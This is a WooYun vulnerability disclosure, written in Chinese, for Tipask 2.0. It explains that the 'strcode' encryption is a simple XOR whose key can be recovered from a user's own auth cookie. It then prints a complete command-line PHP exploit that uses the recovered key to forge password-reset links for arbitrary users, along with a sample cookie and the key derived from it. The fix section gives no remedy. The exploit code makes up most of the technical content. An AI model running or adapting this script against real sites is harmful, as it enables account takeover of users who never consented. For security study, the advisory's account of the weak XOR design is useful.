当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(2) 关注此漏洞

缺陷编号: WooYun-2013-26780

漏洞标题: Tipask 2.0 加密函数破解导致任意用户密码修改

相关厂商: Tipask

漏洞作者: 猪头子

提交时间: 2013-06-24 16:29

公开时间: 2013-09-22 16:30

漏洞类型: 设计缺陷/逻辑错误

危害等级: 高

自评Rank: 20

漏洞状态: 未联系到厂商或者厂商积极忽略

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 help@wooyun.org

Tags标签: 逻辑错误

0人收藏 收藏
分享漏洞:

漏洞详情

披露状态:

2013-06-24: 积极联系厂商并且等待厂商认领中,细节不对外公开
2013-09-22: 厂商已经主动忽略漏洞,细节向公众公开

简要描述:

Tipask问答系统是一款开放源码的PHP仿百度知道程序。以国人的使用习惯为设计理念,采用MVC构架,系统具有速度快,SEO友好,界面操作简洁明快等特点。
但是Tipask中使用的加密算法存在被破解的可能性,因此将导致包括任意用户密码修改等漏洞的发生。

详细说明:

在核心加密算法strcode函数中:

code 区域
/* 通用加密解密函数,phpwind、phpcms、dedecms都用此函数 */


function strcode($string, $auth_key, $action= 'ENCODE') {


    $key = substr(md5($_SERVER[ "HTTP_USER_AGENT"] . $auth_key), 8, 18);


    $string = $action == 'ENCODE' ? $string : base64_decode($string);


    $len = strlen($key);


    $code = '';


    for ($i = 0; $i < strlen($string); $i++) {


        $k = $i % $len;


        $code .= $string[$i] ^ $key[$k];


    }


    $code = $action == 'DECODE' ? $code : base64_encode($code);


    return $code;


}



可以看到加密的算法是异或,所以可以用密文和明文异或的方法反过来求出密钥key,如下:

code 区域
function anti_strcode($authstr, $plaintxt)


{


      $key ='';


      $authstr = urldecode(base64_decode($authstr));     


      for($i = 0; $i < 18; $i++)


      {


            $key .= $authstr[$i] ^ $plaintxt[$i];


      }


      


      return $key;


}



key长度为18,因此我们要找一个明文长度超过18而被加密的字串,经过检查,发现cookie中的auth值长度超过了18,因此将针对cookie中的auth进行key猜解。

漏洞证明:

在Tipask的密码重置中,生成密码重置链接的关键字串是由strcode产生,因此可以利用破解后的key来达到任意密码修改功能。



code 区域
<?php


printf("-------------------------------------------------------


Tipask 2.0 authkey decrypt exploit


Author:ztz


Blog:http://**.**.**.**/


-------------------------------------------------------\n\n" );





if ($argc < 3) {


      print_r( "Usage:         php exp.php uid password auth_cookie\nexample:   php exp.php 1 s3cr4t AjAGAAcFVwcHBwYHUA8GU19UBwtTV1AGAQQMUgMEWwpSVg%3D%3D\n\n");


       exit();


}





$uid = $argv[1];


$password = md5($argv[2]);


$auth_cookie = $argv[3];





$str = "$uid \t$password ";





$key = anti_strcode("$auth_cookie ", " $str");





print "[+]Key: $key \n";


print "[*]Input the username you want to reset: ";


fscanf(STDIN, "%s\n", $username);





print "[*]Encrypting...\n";


$code = urlencode(strcode($username, $key));


print "[+]Reset password here: ?user/resetpass/$code \n";





//function


function anti_strcode($authstr, $plaintxt)


{


      $key = '';


      $authstr = urldecode(base64_decode($authstr));


            


       for($i = 0; $i < 18; $i++)


      {


            $key .= $authstr[$i] ^ $plaintxt[$i];


      }


       return $key;


}





function strcode($string, $key) {


    $len = 18;


    $code = '';


    for ($i = 0; $i < strlen($string); $i++) {


        $k = $i % $len;


        $code .= $string[$i] ^ $key[$k];


    }


    $code = base64_encode($code);


    return $code;


}


?>







首先申请重置目标用户的密码

1.png





利用自己的注册用户的cookie解密key:

2.png





当前登录用户cookie中的auth为VjEFWAFbAwtXBlUDV1ZVCAEAUFkDBQFcVFcCUggCAlNVWg%3D%3D

然后进行解密:

3.png





获得key为d82ab802de152bf9bb

然后输入想要重置的用户:

5.png





获得了重置密码的链接。

6.png



7.png

修复方案:

估计厂商不会来认领,so

版权声明:转载请注明来源 猪头子@乌云

漏洞回应

厂商回应:

未能联系到厂商或者厂商积极拒绝

漏洞评价:

对本漏洞信息进行评价,以更好的反馈信息的价值,包括信息客观性,内容是否完整以及是否具备学习价值

漏洞评价(共0人评价):
登陆后才能进行评分

评价

登录后才能发表评论,请先 登录